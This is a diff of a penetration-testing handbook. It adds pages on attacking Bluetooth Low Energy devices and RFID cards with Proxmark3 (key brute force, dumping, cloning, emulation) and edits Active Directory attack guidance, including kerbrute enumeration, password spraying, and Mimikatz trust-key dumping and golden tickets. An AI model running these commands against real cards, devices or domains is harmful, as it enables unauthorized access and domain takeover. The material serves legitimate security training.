If you see an error like the following one: If you see an error like the following one:
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2).png>) ![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2).png>)
It means that the server **didn't receive the correct domain name** inside the Host header.\ It means that the server **didn't receive the correct domain name** inside the Host header.\
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
@ -336,7 +336,7 @@ You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/
![](<../../.gitbook/assets/image (183).png>) ![](<../../.gitbook/assets/image (183).png>)
Original research: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf) Original research: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
You can also use **metasploit**: `use scanner/http/iis_shortname_scanner` You can also use **metasploit**: `use scanner/http/iis_shortname_scanner`

View file

@ -187,7 +187,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
</methodCall> </methodCall>
``` ```
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2).png>) ![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2) (1).png>)
![](<../../.gitbook/assets/image (102).png>) ![](<../../.gitbook/assets/image (102).png>)

View file

@ -0,0 +1,2 @@
# Radio Hacking

View file

@ -0,0 +1,69 @@
# Pentesting BLE - Bluetooth Low Energy
## Introduction
Available since the Bluetooth 4.0 specification, BLE uses only 40 channels, covering the range of 2400 to 2483.5 MHz. In contrast, traditional Bluetooth uses 79 channels in that same range.
BLE devices communicate is by sending **advertising packets** (**beacons**), these packets broadcast the BLE devices existence to other nearby devices. These beacons sometimes **send data**, too.
The listening device, also called a central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet with additional information that couldnt fit on the initial advertising request, such as the full device name.
![](<../../.gitbook/assets/image (201).png>)
The preamble byte synchronizes the frequency, whereas the four-byte access address is a **connection identifier**, which is used in scenarios where multiple devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several types of PDU; the most commonly used are ADV\_NONCONN\_IND and ADV\_IND. Devices use the **ADV\_NONCONN\_IND** PDU type if they **dont accept connections**, transmitting data only in the advertising packet. Devices use **ADV\_IND** if they **allow connections** and **stop sending advertising** packets once a **connection** has been **established**.
### GATT
The **Generic Attribute Profile** (GATT) defines how the **device should format and transfer data**. When youre analyzing a BLE devices attack surface, youll often concentrate your attention on the GATT (or GATTs), because its how **device functionality gets triggered** and how data gets stored, grouped, and modified. The GATT lists a devices characteristics, descriptors, and services in a table as either 16- or 32-bits values. A **characteristic** is a **data** value **sent** between the central device and peripheral. These characteristics can have **descriptors** that **provide additional information about them**. **Characteristics** are often **grouped** in **services** if theyre related to performing a particular action.
## Enumeration
```bash
hciconfig #Check config, check if UP or DOWN
# If DOWN try:
sudo modprobe -c bluetooth
sudo hciconfig hci0 down && sudo hciconfig hci0 up
# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66
```
### GATTool
**GATTool** allows to **establish** a **connection** with another device, listing that devices **characteristics**, and reading and writing its attributes.\
GATTTool can launch an interactive shell with the `-I` option:
```bash
gatttool -i hci0 -I
[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
[A4:CF:12:6C:B3:76][LE]> characteristics
handle: 0x0002, char properties: 0x20, char value handle:
0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle:
0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
[...]
# Write data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req <characteristic handle> -n <value>
gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)
# Read data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16
# Read connecting with an authenticated encrypted connection
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
```
### Bettercap
```bash
# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported
# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
```

View file

@ -0,0 +1,94 @@
# Pentesting RFID
## Introduction
**Radio Frequency Identification (RFID)** is the most popular short-range radio solution. It's usually used to store and transmit information that identifies an entity.
An RFID tag can rely on **its own power source (active)**, such as an embedded battery, or receive its power from the reading antenna using the current **induced from the received radio waves** (**passive**).
### Classes
EPCglobal divides RFID tags into six categories. A tag in each category has all the capabilities listed in the previous category, making it backward compatible.
* **Class 0** tags are **passive** tags that operate in **UHF** bands. The vendor **preprograms** them at the production factory. As a result, you **cant change** the information stored in their memory.
* **Class 1** tags can also operate in **HF** bands. In addition, they can be **written only once** after production. Many Class 1 tags can also process **cyclic redundancy checks** (CRCs) of the commands they receive. CRCs are a few extra bytes at the end of the commands for error detection.
* **Class 2** tags can be **written multiple times**.
* **Class 3** tags can contain **embedded sensors** that can record environmental parameters, such as the current temperature or the tags motion. These tags are **semi-passive**, because although they **have** an embedded power source, such as an integrated **battery**, they **cant initiate** wireless **communication** with other tags or readers.
* **Class 4** tags can initiate communication with other tags of the same class, making them **active tags**.
* **Class 5** tags can provide **power to other tags and communicate with all the previous tag** classes. Class 5 tags can act as **RFID readers**.
### Information Stored in RFID Tags
An RFID tags memory usually stores four kinds of data: the **identification data**, which **identifies** the **entity** to which the tag is attached (this data includes user-defined fields, such as bank accounts); the **supplementary data**, which provides **further** **details** regarding the entity; the **control data**, used for the tags internal **configuration**; and the tags **manufacturer data**, which contains a tags Unique Identifier (**UID**) and details regarding the tags **production**, **type**, and **vendor**. Youll find the first two kinds of data in all the commercial tags; the last two can differ based on the tags vendor.
The ISO standard specifies the Application Family Identifier (**AFI**) value, a code that indicates the **kind of object** the tag belongs to. Another important register, also specified by ISO, is the Data Storage Format Identifier(**DSFID**), which defines the **logical organization of the user data**.
Most RFID **security controls** have mechanisms that **restrict** the **read** or **write** operations on each user memory block and on the special registers containing the AFI and DSFID values. These **lock** **mechanisms** use data stored in the control memory and have **default passwords** preconfigured by the vendor but allow the tag owners to **configure custom passwords**.
### Low-Frequency RFID Tags
For example key cards that employees use to open doors. These devices rely on **passive** **RFID** technology and operate in a **range of 30 kHz to 300 kHz**, although it's more usual to use 125 kHz to 134 kHz.
### High-Frequency RFID Tags
Many people refer to this technology as **Near Field Communication (NFC)**, a term for devices operating over the 13.56 MHz frequency.
## Attacking RFID Systems with Proxmark3
The first thing you need to do is to have a [**Proxmark3**](https://proxmark.com) and [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)****[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux).
### Attacking MIFARE Classic 1KB
It has **16 sectors**, each of them has **4 blocks** and each block contains **16B**. The UID is in sector 0 block 0 (and can't be altered).\
To access each sector you need **2 keys** (**A** and **B**) which are stored in **block 3 of each sector** (sector trailer). The sector trailer also stores the **access bits** that give the **read and write** permissions on **each block** using the 2 keys.\
2 keys are useful to give permissions to read if you know the first one and write if you know the second one (for example).
Several attacks can be performed
```bash
proxmark3> hf mf #List attacks
proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF
proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key
proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory
proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
```
The Proxmark3 allows to perform other actions like **eavesdropping** a **Tag to Reader communication** to try to find sensitive data. In this card you could just sniff the communication with and calculate the used key because the **cryptographic operations used are weak** and knowing the plain and cipher text you can calculate it (`mfkey64` tool).
### Raw Commands
IoT systems sometimes use **nonbranded or noncommercial tags**. In this case, you can use Proxmark3 to send custom **raw commands to the tags**.
```bash
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
```
With this information you could try to search information about the card and about the way to communicate with it. Proxmark3 allows to send raw commands like: `hf 14a raw -p -b 7 26`
### Scripts
The Proxmark3 software comes with a preloaded list of **automation scripts** that you can use to perform simple tasks. To retrieve the full list, use the `script list` command. Next, use the `script run` command, followed by the scripts name:
```
proxmark3> script run mfkeys
```
You can create a script to **fuzz tag readers**, so copying the data of a **valid card** just write a **Lua script** that **randomize** one or more random **bytes** and check if the **reader crashes** with any iteration.

View file

@ -333,7 +333,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._ * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (5).png>) ![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (4).png>)
{% hint style="info" %} {% hint style="info" %}
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\ It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\

View file

@ -18,7 +18,7 @@ Main concepts of an Active Directory:
1. **Directory** Contains all the information about the objects of the Active directory 1. **Directory** Contains all the information about the objects of the Active directory
2. **Object** An object references almost anything inside the directory (a user, group, shared folder...) 2. **Object** An object references almost anything inside the directory (a user, group, shared folder...)
3. **Domain** The objects of the directory are contained inside the domain. Inside a "forest" more than one domain can exist and each of them will have their own objects collection.&#x20; 3. **Domain** The objects of the directory are contained inside the domain. Inside a "forest" more than one domain can exist and each of them will have their own objects collection.
4. **Tree** Group of domains with the same root. Example: _dom.local, email.dom.local, www.dom.local_ 4. **Tree** Group of domains with the same root. Example: _dom.local, email.dom.local, www.dom.local_
5. **Forest** The forest is the highest level of the organization hierarchy and is composed by a group of trees. The trees are connected by trust relationships. 5. **Forest** The forest is the highest level of the organization hierarchy and is composed by a group of trees. The trees are connected by trust relationships.
@ -52,7 +52,7 @@ If you just have access to an AD environment but you don't have any credentials/
* `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>` * `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
* `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>` * `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
* `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //` * `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
* [**A more detailed guide on how to enumerate a SMB server can be found here.**](broken-reference) * [**A more detailed guide on how to enumerate a SMB server can be found here.**](broken-reference/)
* **Enumerate Ldap**: * **Enumerate Ldap**:
* `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>` * `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
* [**A more detailed guide on how to enumerate LDAP can be found here.**](../../pentesting/pentesting-ldap.md) * [**A more detailed guide on how to enumerate LDAP can be found here.**](../../pentesting/pentesting-ldap.md)
@ -62,14 +62,14 @@ If you just have access to an AD environment but you don't have any credentials/
* Gather credentials **exposing** [**fake UPnP services with evil-S**](../../pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856) * Gather credentials **exposing** [**fake UPnP services with evil-S**](../../pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
* [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology): * [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology):
* Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available. * Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available.
* If you find the complete names of company workers, you could try different AD **username conventions ([**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)**). The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ (3letters of each), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ (abc123). * If you find the complete names of company workers, you could try different AD **username conventions (**[**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ (3letters of each), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ (abc123).
* Tools: * Tools:
* [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username) * [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username)
* [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy) * [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy)
### User enumeration ### User enumeration
When an **invalid username is requested** the server will respond using the **Kerberos error** code *KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN*, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response or the error *KRB5KDC\_ERR\_PREAUTH\_REQUIRED*, indicating that the user is required to perform pre-authentication. When an **invalid username is requested** the server will respond using the **Kerberos error** code _KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN_, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response or the error _KRB5KDC\_ERR\_PREAUTH\_REQUIRED_, indicating that the user is required to perform pre-authentication.
``` ```
./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
@ -83,13 +83,12 @@ crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq
Ok, so you know you have already a valid username but no passwords... Then try: Ok, so you know you have already a valid username but no passwords... Then try:
* [**ASREPRoast**](asreproast.md): If a user **doesn't have** the attribute *DONT\_REQ\_PREAUTH* you can **request a AS\_REP message** for that user that will contain some data encrypted by a derivation of the password of the user. * [**ASREPRoast**](asreproast.md): If a user **doesn't have** the attribute _DONT\_REQ\_PREAUTH_ you can **request a AS\_REP message** for that user that will contain some data encrypted by a derivation of the password of the user.
* [**Password Spraying**](password-spraying.md): Let's try the most **common passwords** with each of the discovered users, maybe some user is using a bad password (keep in mind the password policy!) or could login with empty password: [Invoke-SprayEmptyPassword.ps1](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1). * [**Password Spraying**](password-spraying.md): Let's try the most **common passwords** with each of the discovered users, maybe some user is using a bad password (keep in mind the password policy!) or could login with empty password: [Invoke-SprayEmptyPassword.ps1](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1).
## Enumerating Active Directory WITH credentials/session ## Enumerating Active Directory WITH credentials/session
For this phase you need to have **compromised the credentials or a session of a valid domain account.** For this phase you need to have **compromised the credentials or a session of a valid domain account.** If you have some valid credentials or a shell as a domain user, **you should remember that the options given before are still options to compromise other users**.
If you have some valid credentials or a shell as a domain user, **you should remember that the options given before are still options to compromise other users**.
### Enumeration ### Enumeration
@ -103,7 +102,7 @@ Regarding [**ASREPRoast**](asreproast.md)you can now find every possible vulnera
* You could use some[Windows binaries from the CMD to perform a basic recon](../basic-cmd-for-pentesters.md#domain-info), but using [powershell for recon](../basic-powershell-for-pentesters/) will probably be stealthier, and you could even [**use powerview**](../basic-powershell-for-pentesters/powerview.md) **to extract more detailed information**. Always **learn what a CMD or powershell/powerview command does** before executing it, this way you will know **how stealth are you being**. * You could use some[Windows binaries from the CMD to perform a basic recon](../basic-cmd-for-pentesters.md#domain-info), but using [powershell for recon](../basic-powershell-for-pentesters/) will probably be stealthier, and you could even [**use powerview**](../basic-powershell-for-pentesters/powerview.md) **to extract more detailed information**. Always **learn what a CMD or powershell/powerview command does** before executing it, this way you will know **how stealth are you being**.
* Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a **try**. Find where users can RDP, find path to other groups, etc. * Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a **try**. Find where users can RDP, find path to other groups, etc.
* Look in the LDAP database, with **ldapsearch** or **AdExplorer.exe** to look for credentials in fields *userPassword* & *unixUserPassword*, or even for *Description*. * Look in the LDAP database, with **ldapsearch** or **AdExplorer.exe** to look for credentials in fields _userPassword_ & _unixUserPassword_, or even for _Description_.
* If you are using **Linux**, you could also enumerate the domain using [the-useless-one/pywerview](https://github.com/the-useless-one/pywerview). * If you are using **Linux**, you could also enumerate the domain using [the-useless-one/pywerview](https://github.com/the-useless-one/pywerview).
* You could also try automated tools as: * You could also try automated tools as:
* [tomcarver16/ADSearch](https://github.com/tomcarver16/ADSearch) * [tomcarver16/ADSearch](https://github.com/tomcarver16/ADSearch)
@ -113,9 +112,7 @@ Regarding [**ASREPRoast**](asreproast.md)you can now find every possible vulnera
### **Kerberoast** ### **Kerberoast**
The goal of Kerberoasting is to harvest **TGS tickets for services that run on behalf of domain user accounts**, not computer accounts. Thus, part of these TGS tickets are **encrypted wit keys derived from user passwords**. As a consequence, their credentials could be **cracked offline**. The goal of Kerberoasting is to harvest **TGS tickets for services that run on behalf of domain user accounts**, not computer accounts. Thus, part of these TGS tickets are **encrypted wit keys derived from user passwords**. As a consequence, their credentials could be **cracked offline**. You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**. **Find more information about this attack** [**in the Kerberoast page**](kerberoast.md)**.**
You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**.
**Find more information about this attack [**in the Kerberoast page**](kerberoast.md).**
### Remote connexion (RDP, SSH, FTP, Win-RM, etc) ### Remote connexion (RDP, SSH, FTP, Win-RM, etc)
@ -219,7 +216,7 @@ And if someone tries to delete this user from the Domain Admins (for example) in
### **DSRM Credentials** ### **DSRM Credentials**
There is a **local administrator** account inside each **DC**. Having admin privileges in this machine, you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.\ There is a **local administrator** account inside each **DC**. Having admin privileges in this machine, you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.\
[**More information about DSRM Credentials here.**](dsrm-credentials.md)**** [**More information about DSRM Credentials here.**](dsrm-credentials.md)\*\*\*\*
### **ACL Persistence** ### **ACL Persistence**
@ -246,7 +243,7 @@ You can create you **own SSP** to **capture** in **clear text** the **credential
It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\ It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\
Note that if you use wrong data, pretty ugly logs will appear.\ Note that if you use wrong data, pretty ugly logs will appear.\
[**More information about DCShadow here.**](dcshadow.md)**** [**More information about DCShadow here.**](dcshadow.md)\*\*\*\*
## **Forest Privilege Escalation -** Domain Trusts ## **Forest Privilege Escalation -** Domain Trusts
@ -283,7 +280,7 @@ A trust relationship can also be **transitive** (A trust B, B trust C, then A tr
1. **Enumerate** the trusting relationships 1. **Enumerate** the trusting relationships
2. Check if any **security principal** (user/group/computer) has **access** to resources of the **other domain**, maybe by ACE entries or by being in groups of the other domain. Look for **relationships across domains** (the trust was created for this probably). 2. Check if any **security principal** (user/group/computer) has **access** to resources of the **other domain**, maybe by ACE entries or by being in groups of the other domain. Look for **relationships across domains** (the trust was created for this probably).
1. kerberoast in this case could be another option. 1. kerberoast in this case could be another option.
3. **Compromise** the **accounts** which can **pivot** through domains.&#x20; 3. **Compromise** the **accounts** which can **pivot** through domains.
There are three **main** ways that security principals (users/groups/computer) from one domain can have access into resources in another foreign/trusting domain: There are three **main** ways that security principals (users/groups/computer) from one domain can have access into resources in another foreign/trusting domain:
@ -293,7 +290,7 @@ There are three **main** ways that security principals (users/groups/computer) f
### Child-to-Parent forest privilege escalation ### Child-to-Parent forest privilege escalation
Also, notice that there are **2 trusted keys**, one for _Child --> Parent_ and another one for P_arent --> Child_. Also, notice that there are **2 trusted keys**, one for _Child --> Parent_ and another one for P\_arent --> Child\_.
```bash ```bash
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
@ -312,7 +309,7 @@ Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarco
/ticket:C:\path\save\ticket.kirbi /ticket:C:\path\save\ticket.kirbi
``` ```
For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in S-1-5-21_root domain_-519. For example, from root domain SID _S-1-5-21-280534878-1496970234-700767426_ the "Enterprise Admins"group SID is _S-1-5-21-280534878-1496970234-700767426-519_ For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in S-1-5-21\_root domain\_-519. For example, from root domain SID _S-1-5-21-280534878-1496970234-700767426_ the "Enterprise Admins"group SID is _S-1-5-21-280534878-1496970234-700767426-519_
[http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/) [http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
@ -379,7 +376,7 @@ Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current
**For user objects:** **For user objects:**
* ObjectSID (different from the domain) * ObjectSID (different from the domain)
* lastLogon, lastlogontimestamp&#x20; * lastLogon, lastlogontimestamp
* Logoncount (very low number is suspicious) * Logoncount (very low number is suspicious)
* whenCreated * whenCreated
* Badpwdcount (very low number is suspicious) * Badpwdcount (very low number is suspicious)
@ -410,6 +407,6 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
* [Python script to enumerate active directory](https://github.com/ropnop/windapsearch) * [Python script to enumerate active directory](https://github.com/ropnop/windapsearch)
* [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum) * [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum)
![](<../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (10).png>) ![](<../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)

View file

@ -8,53 +8,53 @@ Do you use **Hacktricks every day**? Did you find the book **very** **useful**?
If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)**** ### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)\*\*\*\*
### [System Info](windows-local-privilege-escalation/#system-info) ### [System Info](windows-local-privilege-escalation/#system-info)
* [ ] Obtain [**System information**](windows-local-privilege-escalation/#system-info)**** * [ ] Obtain [**System information**](windows-local-privilege-escalation/#system-info)\*\*\*\*
* [ ] Search for **kernel** [**exploits using scripts**](windows-local-privilege-escalation/#version-exploits)**** * [ ] Search for **kernel** [**exploits using scripts**](windows-local-privilege-escalation/#version-exploits)\*\*\*\*
* [ ] Use **Google to search** for kernel **exploits** * [ ] Use **Google to search** for kernel **exploits**
* [ ] Use **searchsploit to search** for kernel **exploits** * [ ] Use **searchsploit to search** for kernel **exploits**
* [ ] Interesting info in [**env vars**](windows-local-privilege-escalation/#environment)? * [ ] Interesting info in [**env vars**](windows-local-privilege-escalation/#environment)?
* [ ] Passwords in [**PowerShell history**](windows-local-privilege-escalation/#powershell-history)? * [ ] Passwords in [**PowerShell history**](windows-local-privilege-escalation/#powershell-history)?
* [ ] Interesting info in [**Internet settings**](windows-local-privilege-escalation/#internet-settings)? * [ ] Interesting info in [**Internet settings**](windows-local-privilege-escalation/#internet-settings)?
* [ ] [**Drives**](windows-local-privilege-escalation/#drives)? * [ ] [**Drives**](windows-local-privilege-escalation/#drives)?
* [ ] ****[**WSUS exploit**](windows-local-privilege-escalation/#wsus)? * [ ] \*\*\*\*[**WSUS exploit**](windows-local-privilege-escalation/#wsus)?
* [ ] ****[**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)? * [ ] \*\*\*\*[**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)?
### [Logging/AV enumeration](windows-local-privilege-escalation/#enumeration) ### [Logging/AV enumeration](windows-local-privilege-escalation/#enumeration)
* [ ] Check [**Audit** ](windows-local-privilege-escalation/#audit-settings)and [**WEF** ](windows-local-privilege-escalation/#wef)settings * [ ] Check [**Audit** ](windows-local-privilege-escalation/#audit-settings)and [**WEF** ](windows-local-privilege-escalation/#wef)settings
* [ ] Check [**LAPS**](windows-local-privilege-escalation/#laps)**** * [ ] Check [**LAPS**](windows-local-privilege-escalation/#laps)\*\*\*\*
* [ ] Check if [**WDigest** ](windows-local-privilege-escalation/#wdigest)is active * [ ] Check if [**WDigest** ](windows-local-privilege-escalation/#wdigest)is active
* [ ] [**LSA Protection**](windows-local-privilege-escalation/#lsa-protection)? * [ ] [**LSA Protection**](windows-local-privilege-escalation/#lsa-protection)?
* [ ] ****[**Credentials Guard**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials) * [ ] \*\*\*\*[**Credentials Guard**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials)
* [ ] [**Cached Credentials**](windows-local-privilege-escalation/#cached-credentials)? * [ ] [**Cached Credentials**](windows-local-privilege-escalation/#cached-credentials)?
* [ ] Check if any [**AV**](windows-local-privilege-escalation/#av)**** * [ ] Check if any [**AV**](windows-local-privilege-escalation/#av)\*\*\*\*
* [ ] ****[**AppLocker Policy**](windows-local-privilege-escalation/#applocker-policy)? * [ ] \*\*\*\*[**AppLocker Policy**](windows-local-privilege-escalation/#applocker-policy)?
* [ ] [**UAC**](windows-local-privilege-escalation/#uac)? * [ ] [**UAC**](windows-local-privilege-escalation/#uac)?
